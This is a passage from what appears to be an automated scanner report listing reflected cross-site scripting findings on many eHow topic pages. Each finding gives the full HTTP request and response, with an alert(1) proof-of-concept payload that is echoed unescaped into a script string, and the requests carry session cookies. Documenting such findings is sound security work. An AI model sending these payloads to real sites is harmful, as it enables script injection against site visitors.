Lose Weight Without Dieting | eHow.com
</title
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_3493_lose-weight-dieting.html?93580'-alert(1)-'755710e4e75=1" ref="like" width="300">
...[SNIP]...

4.413. http://www.ehow.com/topic_363_winter-sports.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_363_winter-sports.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2604e'-alert(1)-'eed98f4b047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_363_winter-sports.html?2604e'-alert(1)-'eed98f4b047=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:40 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=363; expires=Thu, 02-Feb-2012 15:14:40 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49424

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Hit the Slopes for Winter Fitness - Downhill sk
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_363_winter-sports.html?2604e'-alert(1)-'eed98f4b047=1" ref="like" width="300">
...[SNIP]...

4.414. http://www.ehow.com/topic_3818_flu-guide.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3818_flu-guide.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39151'-alert(1)-'99641d9590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_3818_flu-guide.html?39151'-alert(1)-'99641d9590d=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:53 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3818; expires=Thu, 02-Feb-2012 15:16:53 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43739

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Flu Guide | eHow.com
</title>
<meta charset
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_3818_flu-guide.html?39151'-alert(1)-'99641d9590d=1" ref="like" width="300">
...[SNIP]...

4.415. http://www.ehow.com/topic_3990_home-security-systems-guide.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3990_home-security-systems-guide.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ae0b'-alert(1)-'f561b0ceb97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_3990_home-security-systems-guide.html?9ae0b'-alert(1)-'f561b0ceb97=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3990; expires=Thu, 02-Feb-2012 15:16:35 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44468

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Home Security Systems Guide | eHow.com
</title
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_3990_home-security-systems-guide.html?9ae0b'-alert(1)-'f561b0ceb97=1" ref="like" width="300">
...[SNIP]...

4.416. http://www.ehow.com/topic_401_home-alarms.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_401_home-alarms.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27202'-alert(1)-'bf34bd8751a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_401_home-alarms.html?27202'-alert(1)-'bf34bd8751a=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:44 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=401; expires=Thu, 02-Feb-2012 15:16:44 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51279

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Home Alarms - Home Alarm Systems | eHow.com
</
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_401_home-alarms.html?27202'-alert(1)-'bf34bd8751a=1" ref="like" width="300">
...[SNIP]...

4.417. http://www.ehow.com/topic_4028_preparing-flu-season.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4028_preparing-flu-season.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c72be'-alert(1)-'7ba2f5cfed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_4028_preparing-flu-season.html?c72be'-alert(1)-'7ba2f5cfed6=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:52 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4028; expires=Thu, 02-Feb-2012 15:16:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42390

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Preparing for Flu Season | eHow.com
</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/topic_4028_preparing-flu-season.html?c72be'-alert(1)-'7ba2f5cfed6=1" ref="like" width="300">
...[SNIP]...

4.418. http://www.ehow.com/topic_4127_home-alarm-system-guide.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4127_home-alarm-system-guide.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8563f'-alert(1)-'3de31e10d00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_4127_home-alarm-system-guide.html?8563f'-alert(1)-'3de31e10d00=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4127; expires=Thu, 02-Feb-2012 15:16:31 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41746

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Home Alarm System Guide | eHow.com
</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/topic_4127_home-alarm-system-guide.html?8563f'-alert(1)-'3de31e10d00=1" ref="like" width="300">
...[SNIP]...

4.419. http://www.ehow.com/topic_429_all-flu.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_429_all-flu.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dac08'-alert(1)-'b2e662a550c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_429_all-flu.html?dac08'-alert(1)-'b2e662a550c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=429; expires=Thu, 02-Feb-2012 15:17:03 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44805

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
All About the Flu - Avoid the Flu | eHow.com
<
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_429_all-flu.html?dac08'-alert(1)-'b2e662a550c=1" ref="like" width="300">
...[SNIP]...

4.420. http://www.ehow.com/topic_4989_photo-sharing-101.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4989_photo-sharing-101.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac526'-alert(1)-'86e037a2e87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_4989_photo-sharing-101.html?ac526'-alert(1)-'86e037a2e87=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:45 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4989; expires=Thu, 02-Feb-2012 15:16:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42954

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Photo Sharing 101 | eHow.com
</title>
<meta
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_4989_photo-sharing-101.html?ac526'-alert(1)-'86e037a2e87=1" ref="like" width="300">
...[SNIP]...

4.421. http://www.ehow.com/topic_49_treating-colds-flus.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_49_treating-colds-flus.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 931c2'-alert(1)-'c447544e077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_49_treating-colds-flus.html?931c2'-alert(1)-'c447544e077=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=49; expires=Thu, 02-Feb-2012 15:17:03 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37719

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Treat Colds and Flus - Treating Colds and Flus
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_49_treating-colds-flus.html?931c2'-alert(1)-'c447544e077=1" ref="like" width="300">
...[SNIP]...

4.422. http://www.ehow.com/topic_5023_jog-lose-weight.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_5023_jog-lose-weight.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7d7a'-alert(1)-'6dddcb2ebd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_5023_jog-lose-weight.html?c7d7a'-alert(1)-'6dddcb2ebd7=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:50 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=5023; expires=Thu, 02-Feb-2012 15:16:50 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43552

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Jog & Lose Weight | eHow.com
</title>
<meta
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_5023_jog-lose-weight.html?c7d7a'-alert(1)-'6dddcb2ebd7=1" ref="like" width="300">
...[SNIP]...

4.423. http://www.ehow.com/topic_689_black-white-photos.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_689_black-white-photos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90ac0'-alert(1)-'2a391c92f95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_689_black-white-photos.html?90ac0'-alert(1)-'2a391c92f95=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:44 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=689; expires=Thu, 02-Feb-2012 15:16:44 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53488

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Take Black and White Photos - Taking Black and
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_689_black-white-photos.html?90ac0'-alert(1)-'2a391c92f95=1" ref="like" width="300">
...[SNIP]...

4.424. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_745_capture-enduring-wedding-photos.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc70b'-alert(1)-'a88873815ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_745_capture-enduring-wedding-photos.html?cc70b'-alert(1)-'a88873815ce=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:45 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=745; expires=Thu, 02-Feb-2012 15:16:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39751

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Capture Enduring Wedding Photos - About Wedding
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html?cc70b'-alert(1)-'a88873815ce=1" ref="like" width="300">
...[SNIP]...

4.425. http://www.ehow.com/topic_7853_floor-fountains-guide.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_7853_floor-fountains-guide.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 520f6'-alert(1)-'466f9c19c1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_7853_floor-fountains-guide.html?520f6'-alert(1)-'466f9c19c1c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:27 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7853; expires=Thu, 02-Feb-2012 15:16:27 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40900

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Floor Fountains Guide | eHow.com
</title>
<
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_7853_floor-fountains-guide.html?520f6'-alert(1)-'466f9c19c1c=1" ref="like" width="300">
...[SNIP]...

4.426. http://www.ehow.com/topic_7992_floor-water-fountains-101.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_7992_floor-water-fountains-101.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1b74'-alert(1)-'1bd517eadfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_7992_floor-water-fountains-101.html?f1b74'-alert(1)-'1bd517eadfe=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:26 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7992; expires=Thu, 02-Feb-2012 15:16:26 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38098

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Floor Water Fountains 101 | eHow.com
</title>
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_7992_floor-water-fountains-101.html?f1b74'-alert(1)-'1bd517eadfe=1" ref="like" width="300">
...[SNIP]...

4.427. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_8016_outdoor-garden-fountains-guide.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75e9c'-alert(1)-'b6eca6d525c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_8016_outdoor-garden-fountains-guide.html?75e9c'-alert(1)-'b6eca6d525c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=8016; expires=Thu, 02-Feb-2012 15:15:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40833

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Outdoor Garden Fountains Guide | eHow.com
</ti
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html?75e9c'-alert(1)-'b6eca6d525c=1" ref="like" width="300">
...[SNIP]...

4.428. http://www.ehow.com/topic_8047_water-garden-fountains-101.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_8047_water-garden-fountains-101.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fda0'-alert(1)-'099222e590f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_8047_water-garden-fountains-101.html?5fda0'-alert(1)-'099222e590f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
